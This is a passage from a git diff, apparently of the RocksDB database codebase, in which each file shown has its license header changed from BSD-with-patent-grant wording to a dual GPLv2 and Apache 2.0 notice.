(c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/heap_test.cc b/util/heap_test.cc index c2008d0aad6..b415615f6fb 100644 --- a/util/heap_test.cc +++ b/util/heap_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/util/kv_map.h b/util/kv_map.h index d49207dcd51..784a244aece 100644 --- a/util/kv_map.h +++ b/util/kv_map.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/util/log_buffer.cc b/util/log_buffer.cc index bb9bb2d164c..d09e0cb002f 100644 --- a/util/log_buffer.cc +++ b/util/log_buffer.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "util/log_buffer.h" diff --git a/util/log_buffer.h b/util/log_buffer.h index daf8ba6f5b7..e356b93a746 100644 --- a/util/log_buffer.h +++ b/util/log_buffer.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/log_write_bench.cc b/util/log_write_bench.cc index c3885a29114..4008e433781 100644 --- a/util/log_write_bench.cc +++ b/util/log_write_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef GFLAGS #include diff --git a/util/logging.h b/util/logging.h index 7612f57626c..992e0018d7c 100644 --- a/util/logging.h +++ b/util/logging.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/memory_usage.h b/util/memory_usage.h index 93f9990072a..0d8854453a8 100644 --- a/util/memory_usage.h +++ b/util/memory_usage.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/mpsc.h b/util/mpsc.h index b81492738c5..7449fd35058 100644 --- a/util/mpsc.h +++ b/util/mpsc.h @@ -1,7 +1,7 @@ // Portions Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Large parts of this file is borrowed from the public domain code below. // from https://github.com/mstump/queues diff --git a/util/murmurhash.cc b/util/murmurhash.cc index 376b644b4db..334ed898ea1 100644 --- a/util/murmurhash.cc +++ b/util/murmurhash.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // /* Murmurhash from http://sites.google.com/site/murmurhash/ diff --git a/util/murmurhash.h b/util/murmurhash.h index 403b67c451c..cbfc4068ed1 100644 --- a/util/murmurhash.h +++ b/util/murmurhash.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // /* Murmurhash from http://sites.google.com/site/murmurhash/ diff --git a/util/mutexlock.h b/util/mutexlock.h index 18210d2c67a..640cef3daf7 100644 --- a/util/mutexlock.h +++ b/util/mutexlock.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/random.cc b/util/random.cc index 99d3bcefc7e..5e2cf626418 100644 --- a/util/random.cc +++ b/util/random.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "util/random.h" diff --git a/util/random.h b/util/random.h index 6fc47425fee..2a5fcbc6ae9 100644 --- a/util/random.h +++ b/util/random.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/rate_limiter.cc b/util/rate_limiter.cc index e8d4cdf87af..b9160b25009 100644 --- a/util/rate_limiter.cc +++ b/util/rate_limiter.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/rate_limiter.h b/util/rate_limiter.h index 106e25c599c..0564bd07c20 100644 --- a/util/rate_limiter.h +++ b/util/rate_limiter.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/rate_limiter_test.cc b/util/rate_limiter_test.cc index 8976206fe6e..f099808b5af 100644 --- a/util/rate_limiter_test.cc +++ b/util/rate_limiter_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/slice.cc b/util/slice.cc index 2ec3ae1073f..8d95a8ae19d 100644 --- a/util/slice.cc +++ b/util/slice.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/slice_transform_test.cc b/util/slice_transform_test.cc index 9b22ba2f0f5..0b0e5648d84 100644 --- a/util/slice_transform_test.cc +++ b/util/slice_transform_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/sst_file_manager_impl.cc b/util/sst_file_manager_impl.cc index 25e97aacc5a..511df32ac7a 100644 --- a/util/sst_file_manager_impl.cc +++ b/util/sst_file_manager_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "util/sst_file_manager_impl.h" diff --git a/util/sst_file_manager_impl.h b/util/sst_file_manager_impl.h index c19ba61334b..b737bf76879 100644 --- a/util/sst_file_manager_impl.h +++ b/util/sst_file_manager_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/status.cc b/util/status.cc index 937978beca0..e0c1af99ec8 100644 --- a/util/status.cc +++ b/util/status.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/status_message.cc b/util/status_message.cc index 89b89096d74..6e9d4e4f7cc 100644 --- a/util/status_message.cc +++ b/util/status_message.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/status.h" diff --git a/util/stderr_logger.h b/util/stderr_logger.h index 8812c622215..8612fce08fe 100644 --- a/util/stderr_logger.h +++ b/util/stderr_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/util/stop_watch.h b/util/stop_watch.h index e8a570e0c32..89be103b73b 100644 --- a/util/stop_watch.h +++ b/util/stop_watch.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once #include "monitoring/statistics.h" diff --git a/util/string_util.cc b/util/string_util.cc index c4545a6810d..a37605aa0f0 100644 --- a/util/string_util.cc +++ b/util/string_util.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "util/string_util.h" diff --git a/util/string_util.h b/util/string_util.h index abda3acc92d..b2bca40ac53 100644 --- a/util/string_util.h +++ b/util/string_util.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/util/sync_point.cc b/util/sync_point.cc index 65c346a64ad..c8c9fbc26a7 100644 --- a/util/sync_point.cc +++ b/util/sync_point.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "util/sync_point.h" #include diff --git a/util/sync_point.h b/util/sync_point.h index 9d0e8b1f9f3..ada61beccc4 100644 --- a/util/sync_point.h +++ b/util/sync_point.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/util/testharness.cc b/util/testharness.cc index 092c3f135ac..7ec35376288 100644 --- a/util/testharness.cc +++ b/util/testharness.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/testharness.h b/util/testharness.h index 1cf3a4fc1b4..8da568123d9 100644 --- a/util/testharness.h +++ b/util/testharness.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/testutil.cc b/util/testutil.cc index 623999342bd..f3010f3f2c0 100644 --- a/util/testutil.cc +++ b/util/testutil.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/testutil.h b/util/testutil.h index 95c6ec2d59e..02bfb0ff6d2 100644 --- a/util/testutil.h +++ b/util/testutil.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/thread_list_test.cc b/util/thread_list_test.cc index 4a2df8f5296..36a221bf2d2 100644 --- a/util/thread_list_test.cc +++ b/util/thread_list_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/util/thread_local.cc b/util/thread_local.cc index d4b3cc06fa5..5361951a993 100644 --- a/util/thread_local.cc +++ b/util/thread_local.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/thread_local.h b/util/thread_local.h index 1f2fa46899d..1ca5b10ddca 100644 --- a/util/thread_local.h +++ b/util/thread_local.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc index 2cdf093fe22..5806cf2653b 100644 --- a/util/thread_local_test.cc +++ b/util/thread_local_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/util/thread_operation.h b/util/thread_operation.h index ee2261e391e..025392b59de 100644 --- a/util/thread_operation.h +++ b/util/thread_operation.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file defines the structures for thread operation and state. // Thread operations are used to describe high level action of a diff --git a/util/threadpool_imp.cc b/util/threadpool_imp.cc index c7603ef1d65..aa40ab9cd4c 100644 --- a/util/threadpool_imp.cc +++ b/util/threadpool_imp.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/threadpool_imp.h b/util/threadpool_imp.h index c7fa5a1037b..cced19bdd33 100644 --- a/util/threadpool_imp.h +++ b/util/threadpool_imp.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/timer_queue.h b/util/timer_queue.h index cc0611921cb..f068ffefbf3 100644 --- a/util/timer_queue.h +++ b/util/timer_queue.h @@ -1,7 +1,7 @@ // Portions Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Borrowed from // http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/ diff --git a/util/timer_queue_test.cc b/util/timer_queue_test.cc index e0c545d0dd8..5f5f08f21bb 100644 --- a/util/timer_queue_test.cc +++ b/util/timer_queue_test.cc @@ -1,7 +1,7 @@ // Portions Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // borrowed from // http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/ diff --git a/util/transaction_test_util.cc b/util/transaction_test_util.cc index af727973de6..0d6948b08fa 100644 --- a/util/transaction_test_util.cc +++ b/util/transaction_test_util.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #ifndef __STDC_FORMAT_MACROS diff --git a/util/transaction_test_util.h b/util/transaction_test_util.h index 4e192bac873..8805490fd83 100644 --- a/util/transaction_test_util.h +++ b/util/transaction_test_util.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/utilities/backupable/backupable_db.cc b/utilities/backupable/backupable_db.cc index 1377e94a641..8921309e469 100644 --- a/utilities/backupable/backupable_db.cc +++ b/utilities/backupable/backupable_db.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc index 3a761c3f058..d1a4bc60a79 100644 --- a/utilities/backupable/backupable_db_test.cc +++ b/utilities/backupable/backupable_db_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index b3ef96bf9c0..e2defe97ca0 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git 